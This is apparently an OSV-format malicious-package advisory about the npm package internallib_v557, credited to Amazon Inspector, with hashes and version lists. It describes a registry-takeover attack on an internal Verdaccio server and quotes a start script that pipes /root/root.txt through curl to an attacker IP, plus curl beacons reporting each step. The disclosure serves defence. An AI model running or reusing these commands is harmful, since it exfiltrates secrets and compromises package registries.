{"id":"MAL-2026-5678","summary":"Malicious code in internallib_v557 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2)\nindex.js implements a multi-step attack against an internal npm registry. On invocation of the exported command(), it: (1) creates a Verdaccio user `pwn99`/`pwn99pass` against http://0.0.0.0:4873/-/user/org.couchdb.user:pwn99 via curl PUT; (2) queries the existing `uhclabs_local_check` package metadata; (3) writes /tmp/pwn99/.npmrc containing a base64-encoded `_auth` for those credentials; (4) `npm publish`es a malicious `uhclabs_local_check@2.0.0` to http://0.0.0.0:4873/ whose package.json `scripts.start` is `cat /root/root.txt | curl -s -d @- http://10.0.0.145:8888/rootflag`; and (5) at every step pipes output (user-create response, version listing, publish stdout/stderr, error output) to http://10.0.0.145:8888/step{1..n} via curl. The downstream effect: any installer who later pulls `uhclabs_local_check` from the internal registry and runs its start script will exfiltrate the contents of /root/root.txt to the hardcoded attacker IP. The attacker also leaves a persistent publishing identity on the internal registry usable for future malicious releases of internal packages. This is a self-propagating namespace-takeover attack with a hardcoded C2 beacon and attacker-controlled persistence — there is no legitimate purpose consistent with the package's stated 'internal lib' scope.\n","modified":"2026-06-12T16:46:41.712995722Z","published":"2026-06-11T21:57:47Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","modified_time":"2026-06-11T21:57:47Z","import_time":"2026-06-11T22:13:50.595564058Z","versions":["1.0.10"],"id":"IN-MAL-2026-005751","sha256":"5cfa498f80e5965de3c072803c8d6e812e75bc5a4fb031f739cbd9c181724be3"},{"sha256":"515c59a706648511619a76984f038231fb7a377179ffc8f223fb6c6344d8022d","source":"amazon-inspector","modified_time":"2026-06-12T15:28:06Z","versions":["1.0.12"],"id":"IN-MAL-2026-005771","import_time":"2026-06-12T16:32:15.269218098Z"},{"sha256":"8a46697983d45d227ca57159302128b0003402847d4e7978650c9e7b88eb43e8","source":"amazon-inspector","modified_time":"2026-06-12T15:28:16Z","versions":["1.0.1"],"id":"IN-MAL-2026-005781","import_time":"2026-06-12T16:32:15.894391289Z"},{"import_time":"2026-06-12T16:32:14.897088591Z","sha256":"8f864aa225698875afc8ce2feefef9f46feaec9532dd0ae41a752ca0ad3ffc01","source":"amazon-inspector","versions":["1.0.21"],"id":"IN-MAL-2026-005765","modified_time":"2026-06-12T15:28:00Z"},{"sha256":"909cc0b096213d5fabf0b417a6ceb5fee4d420f19dd0777a9dd048b92552223f","source":"amazon-inspector","modified_time":"2026-06-12T15:27:58Z","versions":["1.0.19"],"id":"IN-MAL-2026-005762","import_time":"2026-06-12T16:32:14.70996645Z"},{"import_time":"2026-06-12T16:32:15.130829664Z","sha256":"a1cceaa6a553e20e294688ef48cec8478cbd75242f67b74763937cd46297379e","source":"amazon-inspector","versions":["1.0.15"],"id":"IN-MAL-2026-005768","modified_time":"2026-06-12T15:28:02Z"},{"import_time":"2026-06-12T16:32:15.240809042Z","sha256":"24753e0f7dcb30069b7e081debea1589b8f53a03f772593cf8a39886b3b22d0d","source":"amazon-inspector","versions":["1.0.23"],"id":"IN-MAL-2026-005770","modified_time":"2026-06-12T15:28:03Z"},{"import_time":"2026-06-12T16:32:15.051860142Z","sha256":"371586c765a962078a96bb0ecec7b5000a0a9783d01cc02907284ac4088ace4f","source":"amazon-inspector","versions":["1.0.16"],"id":"IN-MAL-2026-005767","modified_time":"2026-06-12T15:28:02Z"},{"sha256":"666cbd7854858b60fbed7ef9845c93ceb4d33ccf5c810b97d16d6c0fb75bda38","source":"amazon-inspector","modified_time":"2026-06-12T15:28:13Z","versions":["1.0.3"],"id":"IN-MAL-2026-005779","import_time":"2026-06-12T16:32:15.788573494Z"},{"import_time":"2026-06-12T16:32:15.375254983Z","sha256":"6df43f4bbb1c58bc26e585f209581aa8f2b1f1ffc639e5fe5f9d61bc774eeb1c","source":"amazon-inspector","versions":["1.0.11"],"id":"IN-MAL-2026-005772","modified_time":"2026-06-12T15:28:07Z"},{"modified_time":"2026-06-12T15:28:09Z","import_time":"2026-06-12T16:32:15.585669983Z","sha256":"ae5880951f8d5f9562e80a80d6f54af58c7129738744d6a5627548583adf9d8e","versions":["1.0.7"],"id":"IN-MAL-2026-005775","source":"amazon-inspector"},{"import_time":"2026-06-12T16:32:15.202339872Z","sha256":"c4b860370e48fbf532c58a1ab2734c9e75662d082a59a4684b0565b08a622304","source":"amazon-inspector","versions":["1.0.14"],"id":"IN-MAL-2026-005769","modified_time":"2026-06-12T15:28:03Z"},{"sha256":"db9ae27bb3518e5ef3e739386892f4b856fba9a4a7aeec518ddbddd914e095d5","source":"amazon-inspector","modified_time":"2026-06-12T15:28:10Z","versions":["1.0.6"],"id":"IN-MAL-2026-005776","import_time":"2026-06-12T16:32:15.62337251Z"},{"import_time":"2026-06-12T16:32:15.707413043Z","sha256":"e0b0a84585b8b97bd9b36a33c21ef65c034ce41510775a2e7ac77121a892ceaa","source":"amazon-inspector","versions":["1.0.5"],"id":"IN-MAL-2026-005777","modified_time":"2026-06-12T15:28:11Z"},{"sha256":"e743cd648f1208ebab7ad50f02509299935d363a9d5dd69fc50f6402782732bc","source":"amazon-inspector","modified_time":"2026-06-12T15:28:07Z","versions":["1.0.13"],"id":"IN-MAL-2026-005773","import_time":"2026-06-12T16:32:15.42351404Z"},{"sha256":"f58c6e76bd6d209bf6cf13052a5000c4d721c85d16f79327b55bd6874949a893","source":"amazon-inspector","modified_time":"2026-06-12T15:28:12Z","versions":["1.0.4"],"id":"IN-MAL-2026-005778","import_time":"2026-06-12T16:32:15.752300278Z"},{"source":"amazon-inspector","modified_time":"2026-06-12T15:28:13Z","import_time":"2026-06-12T16:32:15.864366487Z","versions":["1.0.9"],"id":"IN-MAL-2026-005780","sha256":"0ad3524bb951bb15ff05760def59425d5040545f3aa89cd479c2fcc644eff438"},{"source":"amazon-inspector","modified_time":"2026-06-12T15:28:27Z","import_time":"2026-06-12T16:32:16.618512899Z","versions":["1.0.2"],"id":"IN-MAL-2026-005791","sha256":"12ad882400a73a732f26c29c00d2a16377841a28fbb3fa09b596bf47a4707b24"},{"source":"amazon-inspector","modified_time":"2026-06-12T15:27:58Z","import_time":"2026-06-12T16:32:14.768980591Z","versions":["1.0.22"],"id":"IN-MAL-2026-005763","sha256":"26ab651e98275ede4899e22698958e4d97a43134a0bbb0020f567971b83451e2"},{"sha256":"275af9596caf2b68994ca8282da7e127f8a4478e07888dbae73826328b4e41f2","source":"amazon-inspector","modified_time":"2026-06-12T15:27:59Z","versions":["1.0.24"],"id":"IN-MAL-2026-005764","import_time":"2026-06-12T16:32:14.799632682Z"},{"import_time":"2026-06-12T16:32:14.96805996Z","sha256":"d04f618170995d95d6e7b8a720f4ffc9d59940c8d86ddc4e412a1f579e281f2a","source":"amazon-inspector","versions":["1.0.18"],"id":"IN-MAL-2026-005766","modified_time":"2026-06-12T15:28:01Z"},{"sha256":"4423dbd9ea4452b6b0c4e2c663c82d811718c163228f685cc528923a7d11a089","source":"amazon-inspector","modified_time":"2026-06-12T15:28:08Z","versions":["1.0.8"],"id":"IN-MAL-2026-005774","import_time":"2026-06-12T16:32:15.469642857Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.10"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.12"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.21"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.19"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.15"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.23"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.16"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.3"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.11"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.7"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.14"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.5"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.13"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.22"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.24"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.18"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/internallib_v557/v/1.0.8"}],"affected":[{"package":{"name":"internallib_v557","ecosystem":"npm","purl":"pkg:npm/internallib_v557"},"versions":["1.0.10","1.0.12","1.0.1","1.0.21","1.0.19","1.0.15","1.0.23","1.0.16","1.0.3","1.0.11","1.0.7","1.0.14","1.0.6","1.0.5","1.0.13","1.0.4","1.0.9","1.0.2","1.0.22","1.0.24","1.0.18","1.0.8"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v557/MAL-2026-5678.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-v1A2a2iSC5rrDtawvn1b+bLMFjm43uxbd15iewsIJZUyXfC72ElqplrugXqEOF7kfSm80VGirjxc8lLBQz5oxg==","sha1":"fdaf438f4bda6323d60d6153ef43c51eb9930d96"},"filename":"internallib_v557-1.0.10.tgz"}],"evidence_files":[{"sha256":"c1a4eddedda9b48d93724f255d71cf4a8bf3bc3353436dd66cedc1a9d3d062c8","path":"index.js","tlsh":"c321110519b720351b7a24b59b7ba416b2438d23203cfa603acf97219fc06ac40bf6fc"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}